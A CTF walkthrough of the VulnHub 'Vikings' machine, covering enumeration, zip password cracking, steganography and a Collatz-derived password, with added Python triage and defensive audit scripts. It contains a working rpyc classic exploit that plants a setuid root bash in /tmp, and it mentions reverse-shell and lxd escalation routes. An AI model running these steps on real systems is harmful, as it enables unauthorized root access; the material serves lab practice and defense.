Vikings - VulnHub

Target machine download: Vikings: 1 ~ VulnHub

This machine is quite far from a real-world engagement; it is very much CTF-style.

1. Host discovery

nmap -p 1-65535 -A 192.168.56.108

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
|   256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_  256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.29
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2020-10-29 21:07  site/
|_
|_http-server-header: Apache/2.4.29 (Ubuntu)

OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4

2. Port Scan

I personally like to use dirsearch directly:
dirsearch -u http://192.168.56.108/site/
If nothing useful turns up, scan again. Don't be half-hearted when brute-forcing directories: find a big wordlist and try once more, for example with gobuster:
gobuster dir -r -u http://192.168.56.108/site/ -x txt,html,php -w /usr/share/SecLists-master/Discovery/Web-Content/common.txt

3. Directory scan

cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz            # the wordlist ships gzipped; john needs the plain text file

zip2john daima > hash            # extract the zip's password hash into the file "hash"
john hash --wordlist=rockyou.txt

4. Vulnerability discovery

The page shows the result /war-is-over/. Given the trailing slash, is it a path? Visiting it succeeds and returns a huge run of characters. A blob that large is probably a file, so download it with curl from Kali.

CyberChef can also be used to characterize the content: the Entropy operation was used, and a value above 7.5 means the data is most likely encrypted or compressed.

Base64-decode the content first, then use the Detect File Type operation to identify it: it is a zip.
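As an added example (not from the original walkthrough), the same triage that CyberChef's Entropy and Detect File Type operations perform can be scripted in Python. The sample blob is constructed inline (a base64-encoded, unencrypted zip of pseudo-random bytes standing in for the /war-is-over/ download); the magic-number table is a small subset I chose, and the function names are my own.

```python
import base64
import io
import math
import random
import zipfile
from collections import Counter

# Magic-number table for the formats this triage cares about (assumed subset).
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"\x1f\x8b": "gzip",
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 .. 8.0), the measure CyberChef's Entropy operation reports."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def detect_type(data: bytes) -> str:
    """Identify the container by its leading magic bytes, like Detect File Type."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def looks_like_base64(text: bytes) -> bool:
    """Rough check: only base64 alphabet characters, padding and line breaks."""
    alphabet = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\r\n")
    return bool(text) and set(text) <= alphabet


def triage(blob: bytes) -> dict:
    """Mimic the CyberChef workflow: entropy -> base64 decode -> magic-number check."""
    report = {"raw_entropy": shannon_entropy(blob), "raw_type": detect_type(blob)}
    if looks_like_base64(blob):
        decoded = base64.b64decode(blob, validate=False)
        report["decoded_entropy"] = shannon_entropy(decoded)
        report["decoded_type"] = detect_type(decoded)
    return report


def build_sample() -> bytes:
    """Constructed sample: an unencrypted zip of pseudo-random bytes, base64-encoded."""
    rng = random.Random(1)
    payload = bytes(rng.getrandbits(8) for _ in range(4096))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("king", payload)
    return base64.b64encode(buf.getvalue())


if __name__ == "__main__":
    for key, value in triage(build_sample()).items():
        print(f"{key}: {value}")
```

The base64 text itself can never exceed 6 bits per byte (a 64-symbol alphabet), so a high-entropy verdict only means something once the blob is decoded; the decoded zip of random data lands well above the 7.5 threshold the walkthrough uses.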

Extracting it turns out to require a password, so the only option is to crack it.

Use zip2john to extract the hash from the daima file, write it to hash, and then run it against a large wordlist.

After extraction there is a picture named king, and nothing can be seen in it.

It may be steganography, with information hidden in the picture. Install steghide and run it directly on the image: it asks for a passphrase, and I don't know how to brute-force that. Try another tool: a zip file is found.

From this it can be guessed that the account is floki with password f@m0usboatbuilde7.

5. Vulnerability Exploitation

Log in as floki:

Enter the password:

Try logging in to this account. I don't know the password, so I can't try it; sudo -s doesn't work either.

Looking around for information, I found two files.

Run them straight through a translator and look at boat.

prime-number: a prime, meaning the 29th prime number.

Collatz conjecture: take a positive integer; if it is odd, multiply by 3 and add 1; if it is even, divide by 2; repeat, and you eventually reach 1.

What boat means is: compute the Collatz conjecture sequence for the 29th prime number. Searching online directly gives 109. Here is also the algorithm written as Python code:

n = 0
for x in range(1000):
    if x < 2:
        continue                # 0 and 1 are not prime
    h = int(x / 2) + 1
    for i in range(2, h):
        if x % i == 0:
            break               # found a divisor, x is composite
    else:
        # for/else: the loop finished without a break, so x is prime
        n += 1
        print(n, ":", x)        # the 29th line printed is 109

Then write another script to compute the Collatz sequence. The hint says the values can only be printable characters, i.e. within the ASCII range, so only values up to 255 are kept.

def collatz(x):
    result = [x]                # start with the seed (109 here)
    while x != 1:
        if x % 2 == 1:
            x = (3 * x) + 1
        else:
            x = x // 2          # integer division keeps x an int
        if x <= 255:            # only keep values in the byte/ASCII range
            result.append(x)
    return result

print(collatz(109))

Then use CyberChef: convert the decimal values to characters, keep the printable ones, and finally replace the newlines so it reads as one line, which makes it easier to check. Result: mR)|>^/Gky[gz=\.F#j5P(
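The two scripts above are the walkthrough's own. As an added example that is not part of the original, here is the whole derivation in one place: the n-th prime by trial division, the Collatz chain filtered to values at most 255, and the final conversion to printable ASCII that the walkthrough does in CyberChef. Note that the chain passes through 92, a backslash, between the = and the . ; it is easy to lose when the password is copied through a renderer. The helper names are my own.

```python
def nth_prime(n):
    """Return the n-th prime (1-based) by trial division; fine for small n."""
    count, candidate = 0, 1
    while count < n:
        candidate += 1
        # candidate is prime if no d in [2, sqrt(candidate)] divides it
        if all(candidate % d for d in range(2, int(candidate ** 0.5) + 1)):
            count += 1
    return candidate


def collatz_sequence(x, limit=255):
    """Collatz chain from x down to 1, keeping only values <= limit (the ASCII cap from the hint)."""
    seq = [x] if x <= limit else []
    while x != 1:
        x = 3 * x + 1 if x % 2 else x // 2
        if x <= limit:
            seq.append(x)
    return seq


# Printable ASCII (space .. tilde): what the CyberChef conversion step keeps.
PRINTABLE = set(range(32, 127))


def derive_password(prime_index=29):
    """Chain the three steps: 29th prime -> capped Collatz chain -> printable characters."""
    p = nth_prime(prime_index)
    return "".join(chr(v) for v in collatz_sequence(p) if v in PRINTABLE)


if __name__ == "__main__":
    print("29th prime:", nth_prime(29))
    print("password:", derive_password())
```

Filtering with a printable-ASCII set rather than "<= 255" is what turns the 48-value chain into the 22-character password; bytes such as 164 or 31 survive the cap but are not printable and are dropped.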

6. Elevation of Privileges

Use this password to log in to the ragnar account. As soon as you log in a password is requested; the password for sudo was tried, and those attempts failed as well, so this must be a startup file.

Look for where the startup program is defined. Generally the startup files are the shell dotfiles such as .bash_profile; look at them one by one.

The source of the startup file was found.

Typing /bin/bash -i upgrades the /bin/sh shell to a /bin/bash shell.

Check the permissions of that file: it cannot be modified. If it could be modified, a reverse shell could be put in it, which would be root directly.
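As an added example (not part of the original walkthrough), this Python audit implements the permission check just described for the shell startup files: it reports any dotfile in a home directory that is a symlink, owned by a different uid, or writable by group or others, since any of those would let another account plant commands that run at login. The startup file list and the demo home directory with its modes are my own constructed sample.

```python
import os
import stat
import tempfile

# Shell startup files a login typically sources; the list is an assumption, extend as needed.
STARTUP_FILES = (".bash_profile", ".bash_login", ".profile", ".bashrc", ".bash_logout")


def audit_startup_files(home, expected_uid):
    """Return (file, reason) pairs for startup files that another account could tamper with."""
    findings = []
    for name in STARTUP_FILES:
        path = os.path.join(home, name)
        try:
            st = os.lstat(path)      # lstat: do not follow symlinks, report them instead
        except FileNotFoundError:
            continue
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "is a symlink to " + os.readlink(path)))
            continue
        if st.st_uid != expected_uid:
            findings.append((name, "owned by uid %d, expected %d" % (st.st_uid, expected_uid)))
        if st.st_mode & stat.S_IWGRP:
            findings.append((name, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
    return findings


def demo():
    """Constructed sample: a throw-away home with one safe dotfile and one world-writable one."""
    home = tempfile.mkdtemp()
    for name, mode in ((".profile", 0o644), (".bashrc", 0o646)):
        path = os.path.join(home, name)
        with open(path, "w") as f:
            f.write("# constructed sample, not the target's file\n")
        os.chmod(path, mode)
    return audit_startup_files(home, os.getuid())


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

Run it as audit_startup_files(os.path.expanduser("~"), os.getuid()) on a real account; an empty list is the expected result on a healthy system. The home directory's own permissions matter too, since a writable parent lets the file be replaced rather than edited.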

Here I found something listening on port 18812. Searching online, rpyc_classic is insecure:

Grab root permissions directly from here:

import rpyc

# rpyc classic exposes the whole Python runtime of the server process to any client;
# on this box the server runs as root on localhost:18812 (rpyc's default port).
conn = rpyc.classic.connect('localhost')

def getshell():
    # This body runs on the server side, so it needs its own import.
    import os
    # Copy bash and set the setuid/setgid bits so it keeps root's privileges when run.
    os.system('cp /bin/bash /tmp/bashroot && chmod +s /tmp/bashroot')

# teleport() ships the function to the server and returns a callable that runs it there.
fn = conn.teleport(getshell)
fn()

Run bashroot and see the flags:
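The rpyc classic server is the walkthrough's finding; what follows is an added example of mine, not from the original, showing the defender's side. It parses ss -ltnp output for anything listening on rpyc classic's default port 18812 (a classic server executes arbitrary code for every client that can reach it, so even a localhost bind hands every local user the server's privileges) and flags setuid binaries outside the normal system directories, which is exactly the artifact the exploit above leaves in /tmp. The ss and find output lines are constructed samples, not captured from the target, and the trusted-directory list is an assumption.

```python
import re

RPYC_CLASSIC_PORT = 18812  # default port of rpyc_classic.py (the listener found on the box)

# Constructed sample of `ss -ltnp` output; not captured from the real target.
SS_SAMPLE = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       128     127.0.0.1:18812      0.0.0.0:*          users:(("python3",pid=951,fd=4))
LISTEN  0       511     *:80                 *:*                users:(("apache2",pid=870,fd=4))
"""

# Constructed sample of `find / -perm -4000 -type f -printf '%u %p\n'` output.
SUID_SAMPLE = """\
root /usr/bin/sudo
root /usr/bin/passwd
root /tmp/bashroot
"""

PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')
# Directories where setuid binaries are normally installed (assumed list).
TRUSTED_SUID_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")


def parse_listeners(ss_output):
    """Return (ip, port, process, pid) for each LISTEN line of ss -ltnp output."""
    listeners = []
    for line in ss_output.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue
        ip, port = parts[3].rsplit(":", 1)      # rsplit so IPv6 addresses keep their colons
        m = PROC_RE.search(line)
        proc, pid = (m.group(1), int(m.group(2))) if m else ("?", -1)
        listeners.append((ip, int(port), proc, pid))
    return listeners


def find_rpyc_classic(ss_output):
    """Flag any listener on the rpyc classic port, noting whether it is reachable beyond localhost."""
    findings = []
    for ip, port, proc, pid in parse_listeners(ss_output):
        if port == RPYC_CLASSIC_PORT:
            scope = "localhost only" if ip in ("127.0.0.1", "::1") else "ALL interfaces"
            findings.append(
                f"{proc}[{pid}] listens on {ip}:{port} ({scope}); "
                "any client that can connect runs code as that process's user"
            )
    return findings


def find_suspicious_suid(find_output):
    """Flag setuid binaries outside the usual system directories (e.g. a copied shell in /tmp)."""
    return [
        path
        for owner, path in (l.split(None, 1) for l in find_output.splitlines() if l.strip())
        if not path.startswith(TRUSTED_SUID_DIRS)
    ]


if __name__ == "__main__":
    for hit in find_rpyc_classic(SS_SAMPLE) + find_suspicious_suid(SUID_SAMPLE):
        print(hit)
```

The fix on the server side is not to bind rpyc classic to localhost (that still trusts every local account) but to run the service under an unprivileged user and replace the classic service with a custom rpyc.Service that exposes only the methods actually needed.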

Another way to escalate privileges:

The user is found to be in the lxd group, which can be used to escalate privileges.

Type lxd or lxc; either can be used.

The download failed here, and then I was too lazy to keep trying.
